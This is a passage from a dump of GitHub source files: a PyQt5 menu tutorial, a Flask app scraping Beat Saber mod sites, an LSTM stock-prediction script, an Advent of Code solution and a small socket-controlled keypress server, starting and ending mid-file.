all the events being collected?\n # - this is not the api for it, just add an api for storing events in a queue\n # TODO: how do declare return type of method?\n async def cb_coro(event: network.RequestInterceptedEvent):\n return network.Network.continueInterceptedRequest(interceptionId=event.interceptionId)\n\n with chrome_tab.schedule_coro_on_event(coro=cb_coro,\n event=network.RequestInterceptedEvent):\n await chrome_tab.send_command(enable)\n\n server.close()\n await server.wait_closed()\n","repo_name":"chazkii/chromewhip","sub_path":"tests/test_chrome.py","file_name":"test_chrome.py","file_ext":"py","file_size_in_byte":9807,"program_lang":"python","lang":"en","doc_type":"code","stars":111,"dataset":"github-code","pt":"72"} +{"seq_id":"22636284562","text":"## ex_04 체크 메뉴, 컨텍스트 메뉴\nimport sys \nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QAction, QMenu, qApp\nfrom PyQt5.QtCore import QCoreApplication\n\nclass Exam(QMainWindow): \n def __init__(self):\n super().__init__()\n self.initUI()\n\n# 각 그룹, 메뉴의 위치는 헷갈리지 않도록 작성하기. ★\n# 기본 틀은 맨 위에 메인 그룹, 메뉴 객체 / 서브 그룹, 서브 메뉴\n\n def initUI(self):\n self.statusBar()\n self.statusBar().showMessage(\"안녕하세요!\")\n\n menu = self.menuBar() # 메뉴바 생성\n menu_file = menu.addMenu('File') # 메인 그룹 생성\n menu_edit = menu.addMenu('Edit') # 메인 그룹 생성\n menu_view = menu.addMenu('View') # 메인 그룹 생성\n\n file_exit = QAction('Exit', self) # 메뉴 객체 생성\n file_exit.setShortcut('ctrl+Q') # 단축키 지정\n file_exit.setStatusTip('누르면 잘가고~') # 상태표시줄에 표시될 문구.\n new_txt = QAction('텍스트 파일', self)\n new_py = QAction('파이썬 파일', self)\n view_stat = QAction('상태표시줄',self, checkable=True)\n view_stat.setChecked(True)\n\n # file_exit.triggered.connect(QCoreApplication.instance().quit)\n file_exit.triggered.connect(qApp.quit) # 더 간편하게 끄기 가능.\n view_stat.triggered.connect(self.tglStat) # 상태표시줄 끄고 켜기.\n\n file_new = QMenu('New', self) # 서브 그룹 생성\n\n file_new.addAction(new_txt) # 서브 메뉴 생성\n file_new.addAction(new_py) # 서브 메뉴 생성\n\n menu_file.addMenu(file_new)\n menu_file.addAction(file_exit) # 메뉴 등록\n menu_view.addAction(view_stat)\n self.resize(450, 400)\n self.show()\n \n def tglStat(self, state):\n if state:\n self.statusBar().show()\n else:\n self.statusBar().hide()\n def contextMenuEvent(self, QContextMenuEvent): # 이미 정의된 함수이므로 재정의해서 사용\n cm = QMenu(self)\n\n quit = cm.addAction('Quit')\n\n action = cm.exec_(self.mapToGlobal(QContextMenuEvent.pos())) # 전체적인 맵의 위치를 저장해서 넘김. 추후 우클릭을 어느 위치에서 했냐에 따라 다른 메뉴나올 수 있도록\n if action == quit:\n qApp.quit() # 위의 QCoreApplication보다 더 간단한 방법으로는 qApp import한 후 이렇게 적어주면 끝!\n\n\napp = QApplication(sys.argv) \nw = Exam() \nsys.exit(app.exec_()) \n","repo_name":"Byunggu-Son/MS_AI_School","sub_path":"DAY91_23-02-15/ex_04.py","file_name":"ex_04.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24899430075","text":"from flask import Flask, render_template, request\nimport requests\nfrom bs4 import BeautifulSoup\nimport json\nimport pymongo\nimport os\nimport re\nfrom datetime import datetime\n\napp = Flask(__name__)\n\nsoup = BeautifulSoup(requests.get('https://questboard.xyz').text, 'html.parser')\nfor br in soup.find_all(\"br\"):\n br.replace_with(\"\\n\")\nnews = soup.find(id='News')\ndaytexts = news.find_all(id='daytext')\nnewstexts = news.find_all(id='newstext')\ntitletexts = news.find_all(id='newstitle')\nnewsjson = {}\nfor i in range(0, len(daytexts)):\n newsjson[i] = {\n \"date\": daytexts[i].getText(),\n \"content\": newstexts[i].getText(),\n \"title\": titletexts[i].getText()\n }\n\n\n\n\nmdb = pymongo.MongoClient(f\"mongodb://dbUser:{os.environ['mdbt']}@cluster0-shard-00-00.gjopl.mongodb.net:27017,cluster0-shard-00-01.gjopl.mongodb.net:27017,cluster0-shard-00-02.gjopl.mongodb.net:27017/myFirstDatabase?ssl=true&replicaSet=atlas-10ra3i-shard-0&authSource=admin&retryWrites=true&w=majority\")\ndb = mdb.models.data\n\n@app.route('/api/qosmetics')\ndef apiqosmetics():\n items = []\n page = request.args.get('page')\n query = request.args.get('query')\n typeModel = request.args.get('type')\n direction = request.args.get('direction')\n if direction == \"asc\":\n sdn = 1\n else:\n sdn = -1\n search_item = {}\n if typeModel != \"all\":\n search_item['type'] = typeModel\n if query:\n search_item['name_lower'] = {\"$regex\": query.lower()}\n data = db.find(search_item).sort(\"time\", sdn).skip(int(page)*25).limit((int(page)+1)*25)\n for i in data:\n items.append({\n \"type\": i['type'],\n \"author\": i['author'],\n \"name\": i['name'],\n \"image\": i['image'],\n \"tags\": i['tags'],\n \"download\": i['download'],\n \"time\": i['time'],\n })\n print(items)\n return {\n \"data\": items\n }\n\n@app.route('/page/pcmodel')\ndef pagepcmodel():\n modelid = request.args.get('id')\n d = requests.get(f'https://modelsaber.com/api/v2/get.php?filter=id:{modelid}').json()[modelid]\n data = {\n 'name': d['name'],\n 'content': f'''\n Type: {d['type']}
\n Author: {d['author']}
\n Date: {d['date']}
\n Download
\n OneClick
\n ''',\n 'img': d['thumbnail']\n }\n return render_template('page.html', data=data)\n\n@app.route('/page/questmodel')\ndef pagequestmodel():\n modelid = request.args.get('name').lower()\n d = db.find_one({\"name_lower\": modelid})\n data = {\n 'name': d['name'],\n 'content': f'''\n Type: {d['type']}
\n Author: {d['author']}
\n Date: {datetime.utcfromtimestamp(int(d['time'])).strftime('%Y-%m-%d %H:%M:%S')}
\n Tags: {d['tags']}
\n Download
\n ''',\n 'img': d['image'],\n 'author': d['author'],\n 'tags': d['tags']\n \n }\n return render_template('page.html', data=data)\n\n@app.route('/qosmetics')\ndef qosmetics():\n return render_template('qosmetics.html')\n\n@app.route('/collections')\ndef collections():\n return render_template('collections.html')\n\n@app.route('/api/collections')\ndef apicollections():\n colljson = {}\n page = request.args.get('page')\n html = requests.get('https://hitbloq.com/map_pools/'+str(page)).text\n soup = BeautifulSoup(html, 'html.parser')\n collections = soup.find_all(\"div\", {\"class\": \"ranked-lists-entry-container\"})\n for i in range(0, len(collections)):\n colljson[i] = {\n \"download\": \"https://hitbloq.com\"+collections[i].find(\"a\", {\"class\": \"hashlist-download\"})['href'],\n \"image\": collections[i].find(\"img\", {\"class\": \"ranked-lists-entry-img\"})['src'],\n \"title\": collections[i].find(\"div\", {\"class\": \"ranked-lists-entry-title\"}).getText()\n }\n return colljson\n\n@app.route('/api/ssscrape')\ndef ssscrape():\n PHPSESSID = requests.get('https://scoresaber.com').cookies['PHPSESSID']\n cat = request.args.get('cat')\n sort = request.args.get('sort')\n star = request.args.get('maxStar')\n star1 = request.args.get('minStar')\n page = request.args.get('page')\n verified = request.args.get('verified')\n ranked = request.args.get('ranked')\n if verified == 'true':\n verified = '1'\n if ranked == 'true':\n ranked = '1'\n if ranked == 'false':\n ranked = '0'\n if verified == 'false':\n verified = '0'\n cookie_dict = {\n 'cat': cat,\n 'dark': '0',\n 'sort': sort,\n 'star': star,\n 'star1': star1,\n 'PHPSESSID': PHPSESSID,\n 'verified': verified,\n 'ranked': ranked\n }\n req_u_1 = f'https://scoresaber.com/imports/user-setting.php?verified={verified}&ranked={ranked}&sort={sort}&cat={cat}&star={star}&star1={star1}'\n requests.get(req_u_1)\n html = requests.get('https://scoresaber.com?page='+page, cookies=cookie_dict).text\n soup = BeautifulSoup(html, 'html.parser')\n songs = soup.find('tbody')\n songs = songs.find_all('tr')\n songJson = {}\n for i in range(0, len(songs)):\n songJson[i] = {\n \"image\": songs[i].find(\"td\", class_=\"song\").find('img')['src'],\n \"name\": songs[i].find(\"td\", class_=\"song\").find('a').getText().strip(),\n \"difficulty\": songs[i].find(\"td\", class_=\"difficulty\").getText().strip(),\n \"author\": songs[i].find(\"td\", class_=\"author\").find('a').getText().strip(),\n \"total_plays\": songs[i].find(\"td\", class_=\"scores\").getText().strip(),\n \"plays_pastday\": songs[i].find(\"td\", class_=\"percentage\").getText().strip(),\n \"stars\": songs[i].find(\"td\", class_=\"stars\").getText().strip()\n }\n\n return songJson\n\n\n\n\n\n\n@app.route('/api/noticeboard')\ndef noticeboard():\n return newsjson\n\n@app.route('/')\ndef main():\n out_html = ''\n for item in newsjson:\n out_html += f'{newsjson[item][\"title\"]}
{newsjson[item][\"date\"]}

{newsjson[item][\"content\"]}


'\n return render_template('testing.html', board=out_html)\n\n\n@app.route('/api/maps')\ndef apimaps():\n sort = request.args.get('sort')\n page = request.args.get('page')\n query = request.args.get('query')\n chroma = request.args.get('chroma')\n ranked = request.args.get('ranked')\n noodle = request.args.get('noodle')\n if query is None:\n req_url = f\"https://api.beatsaver.com/search/text/{page}?sortOrder={sort}\"\n else:\n req_url = f\"https://api.beatsaver.com/search/text/{page}?q={query}&sortOrder={sort}&chroma={chroma}&noodle={noodle}&ranked={ranked}\"\n print(req_url)\n return requests.get(req_url).json()\n\n\n@app.route('/api/models')\ndef apimodels():\n sort = request.args.get('sort')\n query = request.args.get('query')\n page = int(request.args.get('page'))\n modeltype = request.args.get('type')\n direction = request.args.get('direction')\n req_url = f'https://modelsaber.com/api/v2/get.php?type={modeltype}&sort={sort}&filter={query}&start={page*26}&end={(page+1)*26}&sortDirection={direction}'\n print(req_url)\n r = requests.get(req_url)\n return r.json()\n\n@app.route('/scoresaber')\ndef scoresaber():\n return render_template('scoresaber.html')\n\n@app.route('/api/scoresaber')\ndef apiscoresaber():\n page = int(request.args.get('page'))+1\n cat = request.args.get('cat')\n req_url = f'http://scoresaber.com/api.php?function=get-leaderboards&cat={cat}&page={page}&limit=14'\n print(req_url)\n r = requests.get(req_url)\n return r.json()\n\n\n@app.route('/api/downloadscoresaber')\ndef downloadscoresaber():\n url = f\"https://beatsaver.com/api/search/text/0?q={request.args.get('name')}\"\n r = requests.get(url)\n id = r.json()['docs'][0]['id']\n print(id)\n return 'beatsaver://'+id\n\n@app.route('/maps')\ndef maps():\n return render_template('maps.html')\n\n@app.route('/models')\ndef models():\n return render_template('models.html')\n\n@app.route('/testing')\ndef testing():\n return render_template('testing.html')\n\n\n@app.route('/api/saberimg')\ndef saberimg():\n id = request.args.get('id')\n data = 'empty'\n png = requests.get(f'https://modelsaber.com/files/saber/{id}/image.png')\n if png.status_code == 200:\n data = png.raw\n jpg = requests.get(f'https://modelsaber.com/files/saber/{id}/image.jpg')\n if jpg.status_code == 200:\n data = jpg.raw\n gif = requests.get(f'https://modelsaber.com/files/saber/{id}/image.gif')\n if gif.status_code == 200:\n data = gif.raw\n print(data)\n return data\n\n\napp.run(host='0.0.0.0', port=8080)\n\n","repo_name":"SushiPython/bsmod","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8485,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"70633312873","text":"# pip install -U finance-datareader\n\nimport numpy as np\nimport pandas as pd\nimport FinanceDataReader as fdr # 버전 문제로 오류가 날수 있다 아래 내용을 터미널에서 처리해 준다.\n# pip install -U finance-datareader : 해당 라이브러리 설치 해 주고\n# pip install --uphrade pandas : 오류가 나면 판다스 버전을 올려주고\n# pip install bs4 : bs4 오류가 나면 설치해 준다\n\nfrom sklearn import preprocessing\n\nimport keras\nfrom keras.models import Model\nfrom keras.layers import Dense, Dropout, LSTM, Input, Activation\nfrom keras import optimizers\n\nimport tensorflow\n\n# FinanceDataReader.DataReader : 주가 데이터, 거래량, 시가, 고가, 저가, 수정주가, 주식 분할, 배당금 등을 제공.\n# 또한 지수 데이터, 환율 데이터, 암호화폐 데이터 등 다양한 종류의 금융 데이터도 가져올 수 있으며, DataFrame 형테임\n\ndef call_dataset(ticker = '005930', stt = '2022-01-01', end = '2023-08-16', history_points = 50):\n data = fdr.DataReader(ticker, stt, end)\n print('1. data: ', data)\n data = data.iloc[:,0:-1] # 행 번호 기준으로 값 읽기(모든 행에 대해서, 처음부터 ~ 마지막 열 전까지 가져오기)\n # 열을 한줄 제외하고 값을 가져오는것 (주식의 급락율 제외함)\n print('data: ', data.shape) # DataFrame의 행의개수, 열의 개수로 반환한다.\n data = data.values # 필드와 인덱스를 제외하고 값만 갖는다\n print('2. data: ', data) # DataFrame의 행의개수, 열의 개수로 반환한다.\n\n # sklearn.Preprocessing.MinMaxScaler() : sklearn에서 지원하는 전처리기 데이터를 0과 1 사이의 범위로 변환 (최소-최대 스케일링)\n\n data_normalizer = preprocessing.MinMaxScaler() # 데이터를 0~1 범위로 점철되게 하는 함수 call\n data_normalized = data_normalizer.fit_transform(data) # 데이터를 0~1 범위로 점철되게 함수 수행(데이터를 이용하여 훈련)\n print('data_normalized: ', data_normalized.shape)\n print('3. data_normalized: ', data_normalized)\n\n # using the last {history_points} open close high low volume data points, predict the next open value\n # (번역) 마지막 {history_points} 오픈 클로즈 하이 로우 볼륨 데이터 포인트를 사용하여 다음 시가를 예측합니다.\n # ohlcv를 가지고 오되, 관찰 일수 만큼 누적해서 쌓는다. (열방향으로)\n # 380 라인에서 -50을 한 후에 330 를 50개를 복사하는데 이때 값을 0부터 1씩 올라가게 한다. (0 ~ 330, 1~331, 2~332 .. 이렇게 들어간다)\n ohlcv_histories_normalized = np.array([data_normalized[i:i + history_points].copy() for i in range(len(data_normalized) - history_points)])\n print('7. ohlcv_histories_normalized : ',ohlcv_histories_normalized)\n\n # print('2. ohlcv_histories_normalized: ', ohlcv_histories_normalized)\n # print('ohlcv_histories_normalized: ', ohlcv_histories_normalized.shape)\n\n # 1차원 배열로 전달한다. np.arraty([data_normalized[][]])\n # data_normalized[:, 0] : 해당 2차원 배열에서 0번째 열에 있는 데이터를 반환한다(즉 2차원 배열에서 0번쨰 값만 남긴상태).\n # data_normalized[:, 0][i + history_points] : i는 0~(380-50)까지 for 문으로 반환하여 i+history_points 는 50~380 값을 반환한다.\n # 그러면 2차원 배열에서 0번째 열의 데이터만 가진 2차원 배열에서 50~380 배열 값을 가지고 np,array로 변환하여 1차원 배열로 반환한다.\n next_day_open_values_normalized = np.array([data_normalized[:, 0][i + history_points].copy() for i in range(len(data_normalized) - history_points)])\n # 1XN 벡터는 2차원 배열로 표현된 행 벡터이며, NX1 벡터는 2차원 배열로 표현된 열 벡터입니다.\n # 즉, 1XN 벡터를 NX1 벡터로 변환하는 작업은 해당 벡터를 전치(Transpose)하는 것과 동일합니다.\n print('8. next_day_open_values_normalized : ',next_day_open_values_normalized)\n next_day_open_values_normalized = np.expand_dims(next_day_open_values_normalized, -1) # 1XN 벡터 -> NX1 벡터로\n print('9. next_day_open_values_normalized : ',next_day_open_values_normalized)\n next_day_open_values = np.array([data[:, 0][i + history_points].copy() for i in range(len(data) - history_points)])\n next_day_open_values = np.expand_dims(next_day_open_values, -1) # 1XN 벡터 -> NX1 벡터로\n print('10. next_day_open_values : ',next_day_open_values)\n y_normalizer = preprocessing.MinMaxScaler()\n y_normalizer.fit(next_day_open_values)\n print('11. y_normalizer : ',y_normalizer)\n\n\n # 인풋 X : 그 이전의 OHLCV (from T = -50 to T = -1)\n # 아웃풋 y : 예측하고자 하는 주가 T = 0\n\n def calc_ema(values, time_period): #정규화된\n # https://www.investopedia.com/ask/answers/122314/what-exponential-moving-average-ema-formula-and-how-ema-calculated.asp\n # 지수이동평균법(EMA) 사용\n # 공식 : EMA =(Price(t)*k)+(EMA(t-1)*(1-k))\n # Price(t) : 현재 가격\n # EMA(t-1) : 바로 전 기간의 EMA\n # k = 2/(n+1) : n은 MA의 숫자 (예: MA-5,MA-7,MA-20,MA-100 등)\n sma = np.mean(values[:, 3])\n ema_values = [sma]\n k = 2 / (1 + time_period)\n for i in range(len(his) - time_period, len(his)):\n close = his[i][3]\n ema_values.append(close * k + ema_values[-1] * (1 - k))\n return ema_values[-1]\n\n technical_indicators = []\n for his in ohlcv_histories_normalized:\n # note since we are using his[3] we are taking the SMA of the closing price\n # print('his: ', his)\n # print('his[:, 3]: ', his[:, 3])\n sma = np.mean(his[:, 3]) # 각 데이터포인트별 Close Price 평균 (4번쨰 열에 대한 평균을 구한다.)\n print('3. sma: ', sma)\n '''# 위의 예시의 의미 \n 주어진 his는 여전히 리스트의 리스트 구조로 이루어진 3D 리스트입니다. 각 원소가 2D 리스트인 세 개의 서브 리스트를 포함하고 있습니다.\n his = [\n [[1, 2, 3, 1, 5], [1, 2, 3, 1, 5], [1, 2, 3, 1, 5]],\n [[2, 3, 4, 5, 6], [2, 3, 4, 5, 6], [2, 3, 4, 5, 6]],\n [[3, 4, 5, 6, 7], [3, 4, 5, 6, 7], [3, 4, 5, 6, 7]]\n ]\n 이제 np.mean(his[:, 3])을 계산하겠습니다. his[:, 3]는 3D 리스트 his의 첫 번째 차원에 해당하는 모든 서브 리스트들이 선택되며,\n 각 서브 리스트에서 3번째 열(인덱스 3에 해당하는 열)에 대한 값을 반환하게 됩니다. \n 먼저, 주어진 his에서 각 서브 리스트들의 3번째 열을 추출하겠습니다: \n [1, 1, 1]\n [5, 5, 5]\n [6, 6, 6]\n 이제 np.mean(his[:, 3])은 위에서 추출한 열에 대한 평균을 계산합니다: \n np.mean([1, 1, 1, 5, 5, 5, 6, 6, 6])\n 따라서 결과는 (1 + 1 + 1 + 5 + 5 + 5 + 6 + 6 + 6) / 9 ≈ 3.2222가 됩니다 \n '''\n # his 는 380에서 앞에 50개를 한개씩 더한 330, 331, 332 ...\n print('4. EMA-12 : ',calc_ema(his, 12))\n print('4. EMA-26 : ',calc_ema(his, 26))\n macd = calc_ema(his, 12) - calc_ema(his, 26) # 12일 EMA - 26일 EMA (지수이동평균 12일 기준 - 지수이동평균 26일 로 처리함)\n print('5. sma : ',sma)\n print('5. macd : ',macd)\n technical_indicators.append(np.array([sma]))\n\n technical_indicators = np.array(technical_indicators) # for 문으로 돌린 종가의 이동평균값 배열을 넘파이로 변환한다.\n\n tech_ind_scaler = preprocessing.MinMaxScaler() # 데이터를 0~1사이의 값으로 바꾼다.\n # fit_transform() 메서드는 두 단계를 합친 것으로,\n # 우선 데이터를 스케일링하기 위한 변환(Scaling)에 필요한 평균과 분산을 계산하고,\n # 그 후에 실제로 데이터를 스케일링하여 변환된 값을 반환합니다.\n technical_indicators_normalized = tech_ind_scaler.fit_transform(technical_indicators)\n\n # ??위에서 같은 작업을 하는데 중간에 값이 수정되는지 찍어봐야 할것 같음\n technical_indicators = np.array(technical_indicators)\n tech_ind_scaler = preprocessing.MinMaxScaler()\n technical_indicators_normalized = tech_ind_scaler.fit_transform(technical_indicators)\n\n # assert는 뒤에 나오는 조건문의 ture값을 보장하는 것으로 여기에는 안나왔지만 false가 될때는 따로 오류메시지를 줄 수 있다.\n # 참조 : https://blockdmask.tistory.com/553\n assert ohlcv_histories_normalized.shape[0] == next_day_open_values_normalized.shape[0] == technical_indicators_normalized.shape[0]\n\n print('ohlcv_histories_normalized.shape[0]: ', ohlcv_histories_normalized.shape[0])\n\n return ohlcv_histories_normalized, technical_indicators_normalized, next_day_open_values_normalized, next_day_open_values, y_normalizer\n\n\n\n\nnp.random.seed(4) #고정된 난수 발생을 위해 설정\n\nhistory_points = 50\nticker = '000660' # sk hynix\n\ndef main():\n print(\"tensorflow ver: \"+tensorflow.__version__) # 텐서플로 버전 확인\n tensorflow.random.set_seed(44) # 텐서플로에서 시드 44로 렌덤생성\n\n # dataset 생성\n ohlcv_histories, _, next_day_open_values, unscaled_y, y_normaliser = call_dataset(ticker=ticker)\n print('6. ohlcv_histories : ',ohlcv_histories) # 시그모이드 함수로 값들을 바꾼 후에 330건씩 50일로 나눠서 3차원 배열로 만든값\n print('6. _ : ',_) # 330개를 가지고 있는 50묶음의 배열에 대한 종가의 평균 배열\n print('6. next_day_open_values : ',next_day_open_values)# 시그모이드함수로 정규화된 주식 시작가 2차원 배열 (대신에 1차원에 값이 하나씩만 들어있다)\n print('6. unscaled_y : ',unscaled_y) # 시작가만 있는 (정규화 X) 2차원 배열 (기존에 받아온 데이터에서 시작가격만 남기고 삭제)\n print('6. y_normaliser : ',y_normaliser) # MinMaxScaler()\n\n\n train_ratio = 0.7\n n = int(ohlcv_histories.shape[0] * train_ratio) # 330 * 0.7의 값을 가진다. = 230\n print('13. n : ',ohlcv_histories.shape[0])\n print('14. n : ',n)\n # print('13. ohlcv_histories.shape : ',ohlcv_histories.shape)\n\n ohlcv_train = ohlcv_histories[-n:-1] # 330 중에서 100 ~ 330이전까지 229개\n y_train = next_day_open_values[-n:-1]\n\n ohlcv_test = ohlcv_histories[:ohlcv_histories.shape[0] - n]\n y_test = next_day_open_values[:ohlcv_histories.shape[0] - n]\n\n unscaled_y_test = unscaled_y[:ohlcv_histories.shape[0] - n]\n\n print('ohlcv_train.shape: ', ohlcv_train.shape)\n print('ohlcv_test.shape: ', ohlcv_test.shape)\n\n ohlcv_train\n\n # model architecture\n # Keras의 함수형 API를 사용하여 LSTM 네트워크에 입력을 정의하는 부분입니다.\n # Input(shape=(50, 5), name='lstm_input')는 LSTM 네트워크에 들어갈 입력 데이터의 형태를 정의하는 부분입니다.\n # Input: Keras 함수형 API에서 모델의 입력을 정의하는 클래스입니다.\n # shape=(50, 5): 입력 데이터의 형태를 나타내며, (시퀀스 길이, 특성 개수)로 구성됩니다. 이 경우, 시퀀스 길이는 50이며, 각 시퀀스는 5개의 특성으로 구성되어 있음을 의미합니다.\n # name='lstm_input': 입력 레이어의 이름을 지정합니다. 이를 통해 모델을 시각화하거나 모델의 구조를 살펴볼 때 레이어를 식별할 수 있습니다.\n # 이를 통해 입력 데이터의 형태가 (None, 50, 5)인 LSTM 모델을 구성할 수 있습니다. 여기서 None은 입력 데이터의 배치 크기를 의미하며, 실제 모델을 컴파일할 때 배치 크기가 지정됩니다.\n # 입력 데이터의 형태는 (시퀀스 길이, 특성 개수)로 50개의 시퀀스 길이와 각 시퀀스에 5개의 특성으로 구성된 3D 텐서입니다.\n lstm_input = Input(shape=(history_points, 5), name='lstm_input')\n x = LSTM(50, name='lstm_0')(lstm_input) # 50개의 유닛(뉴런)을 가진 LSTM 샐을 생성, 이름은 'lstm_0'으로하고, lstm_input로 출력을 생성\n x = Dropout(0.2, name='lstm_dropout_0')(x) # 과적합을 방지하기 위한 드롭아웃 레이어 랜덤하게 일부 뉴런 비활성화 (0.2)는 20%를 뜻한다, lstm_dropout_0는 레이어 이름\n x = Dense(64, name='dense_0')(x) # 64개의 유닛을 가진 완전 연결 레이어를 생성합니다, dense_0는 레이어 이름\n x = Activation('sigmoid', name='sigmoid_0')(x) # 활성화 함수를 정의합니다. sigmoid 활성화 함수를 적용하여 출력을 생성,\n x = Dense(1, name='dense_1')(x) # 마지막 완전 연결(Dense) 레이어를 정의합니다. 이 레이어는 1개의 유닛을 가지며, 최종적인 출력을 생성한다, 입력 데이터 x에 마지막 완전 연결 레이어를 적용하여 출력을 생성한다\n # 최종 출력 레이어를 정의합니다. 활성화 함수로 linear를 사용하여 선형 함수를 적용합니다. 선형 함수는 입력과 동일한 값을 출력하는 함수이며, 회귀 문제에서 주로 사용한다. 입력 데이터 x에 최종 출력 레이어를 적용하여 최종 출력을 생성합니다.\n output = Activation('linear', name='linear_output')(x)\n # 위와 같이 정의된 모델은 LSTM 기반의 시계열 예측 모델이며, 입력으로 50개의 시퀀스 길이와 5개의 특성을 가진 데이터를 받고, 출력으로 단일 값을 예측합니다.\n\n\n\n model = Model(inputs=lstm_input, outputs=output) # 입력과 출력을 지정하여 최종 모델을 생성합니다.\n adam = optimizers.Adam(lr=0.0005) # Adam 옵티마이저를 생성합니다. 학습률(learning rate)은 0.0005로 설정되어 있습니다.\n model.compile(optimizer=adam, loss='mse') # 모델을 컴파일합니다. 손실 함수로는 평균 제곱 오차(Mean Squared Error, MSE)를 사용하고, Adam 옵티마이저를 지정합니다\n # 모델을 학습합니다. 입력 데이터로 ohlcv_train, 출력 데이터로 y_train을 사용하며, 한 번의 배치 크기는 32입니다.\n # 총 50 에포크(epoch) 동안 학습하며, 데이터를 무작위로 섞어가며 학습합니다.\n # 학습 데이터의 10%를 검증 데이터로 사용하도록 지정되어 있습니다.\n model.fit(x=ohlcv_train, y=y_train, batch_size=32, epochs=50, shuffle=True, validation_split=0.1)\n # evaluation\n\n y_test_predicted = model.predict(ohlcv_test) # 학습된 모델을 사용하여 ohlcv_test 데이터를 예측합니다.\n y_test_predicted = y_normaliser.inverse_transform(y_test_predicted) # 정규화된 예측값을 다시 역정규화하여 원래의 주가 단위로 변환합니다.\n y_predicted = model.predict(ohlcv_histories) # 학습된 모델을 사용하여 ohlcv_histories 데이터를 예측합니다.\n y_predicted = y_normaliser.inverse_transform(y_predicted) # 정규화된 예측값을 다시 역정규화하여 원래의 주가 단위로 변환합니다.\n\n assert unscaled_y_test.shape == y_test_predicted.shape # assert는 해당값의 true라는 것을 보장\n print('15. y_test_predicted : ',y_test_predicted)\n print('16. unscaled_y_test : ',unscaled_y_test)\n\n real_mse = np.mean(np.square(unscaled_y_test - y_test_predicted)) #공통된 값을 빼고, 값 값을 제곱한 다음에 배열의 평균을 구한다.\n scaled_mse = real_mse / (np.max(unscaled_y_test) - np.min(unscaled_y_test)) * 100\n print(scaled_mse)\n\n from datetime import datetime\n model.save(f'basic_model.h5')\n\n import matplotlib.pyplot as plt\n\n plt.gcf().set_size_inches(22, 15, forward=True)\n\n start = 0\n end = -1\n\n # real = plt.plot(unscaled_y_test[start:end], label='real')\n # pred = plt.plot(y_test_predicted[start:end], label='predicted')\n\n real = plt.plot(unscaled_y[start:end], label='real')\n pred = plt.plot(y_predicted[start:end], label='predicted')\n\n plt.legend(['Real', 'Predicted'])\n plt.title('SK Hynix Using LSTM by TGG')\n plt.show()\n\n col_name = ['real', 'pred']\n real, pred = pd.DataFrame(unscaled_y[start:end]), pd.DataFrame(y_predicted[start:end])\n foo = pd.concat([real, pred], axis=1)\n foo.columns = col_name\n\n foo\n\n foo.corr()\n\n foo['real+1'] = foo['real'].shift(periods=1)\n foo[['real+1', 'pred']].corr()\n\n\nmain()\n\n\n\n\n","repo_name":"zigoom/BLUE_OCEAN","sub_path":"workspace/python/Server_Test/test_function/lstm_test_orignal.py","file_name":"lstm_test_orignal.py","file_ext":"py","file_size_in_byte":16878,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"261058338","text":"import math\nfrom collections import namedtuple, defaultdict\nfrom heapq import heappush, heappop\nfrom typing import Generator, Tuple, List, Set\n\n_INPUT_FILE = 'input.txt'\n\n\nPoint = namedtuple('Point', ['x', 'y'])\n\n\ndef read_input(input_file: str) -> Generator[Point, None, None]:\n with open(file=input_file, mode='r') as f:\n for i, line in enumerate(f.readlines()):\n for j,col in enumerate(list(line)):\n if col == '#':\n yield Point(j, i)\n\n\ndef distance(a: Point, b: Point) -> float:\n \"\"\"Compute distance between two points\"\"\"\n return math.sqrt(math.pow(b.x - a.x, 2) + math.pow(b.y - a.y, 2))\n\n\ndef angle(a: Point, b: Point) -> int:\n \"\"\"Compute angle between ortogonal and difference vectors\"\"\"\n ang = math.degrees(math.atan2(b.y - a.y, b.x - a.x)) + 90\n return ang + 360 if ang < 0 else ang\n\n\ndef compute_visibility_angles(asteroid: Point, asteroid_list: List[Point]) -> Set[int]:\n return {angle(asteroid, ast) for ast in asteroid_list}\n\n\ndef group_asteroids_by_angle(space_station, asteroid_list):\n angle_dict = defaultdict(list)\n for ast in asteroids:\n # Each dict entry holds a heap ordered by distance to asteroid\n heappush(angle_dict[angle(space_station, ast)], (distance(space_station, ast), ast))\n return angle_dict\n\n\ndef eliminate_asteroids(angle_dict):\n eliminated = 0\n last_eliminated = None\n while True:\n for ang in sorted(angle_dict.keys()):\n if angle_dict[ang]:\n last_eliminated = heappop(angle_dict[ang])\n eliminated += 1\n print(f\"Vaporizing asteroid #{eliminated} at {last_eliminated}\")\n if eliminated == 200:\n return last_eliminated[1]\n\n\nif __name__ == '__main__':\n asteroids = list(read_input(input_file=_INPUT_FILE))\n angle_dict = group_asteroids_by_angle(Point(13, 17), asteroids)\n asteroid_200_pos = eliminate_asteroids(angle_dict)\n print(f\"Answer: {asteroid_200_pos[0] * 100 + asteroid_200_pos[1]}\")\n\n","repo_name":"JMLizano/AOC2019","sub_path":"day10/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37892092507","text":"import socket\nimport sys\nfrom pynput.keyboard import Key, Controller\nimport time\n\nTCP_IP = sys.argv[1]\nTCP_PORT = 5005\nBUFFER_SIZE = 20 # Normally 1024, but we want fast response\n\nkeyboard = Controller()\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.bind((TCP_IP, TCP_PORT))\ns.listen(1)\n\nprint(\"Server: \", TCP_IP)\n\nwhile 1:\n\ttry:\n\t\tprint(\"Waiting...\")\n\n\t\tconn, addr = s.accept()\n\t\tprint('Connection address: ', addr)\n \n\t\tdata = conn.recv(BUFFER_SIZE)\n\t\tif not data: break\n\t\tprint(\"received data:\", data,)\n\t\t\n\t\tif data == b'forward':\n\t\t\tkeyboard.press(Key.right)\n\t\t\tkeyboard.release(Key.right)\n\t\telif data == b'backward':\n\t\t\tkeyboard.press(Key.left)\n\t\t\tkeyboard.release(Key.left)\n\texcept KeyboardInterrupt:\n\t\tif conn:\n\t\t\tconn.close()\n\t\tprint(\"W: interrupt received, stopping…\")\n\t\tbreak\n\tfinally:\n\t\t# clean 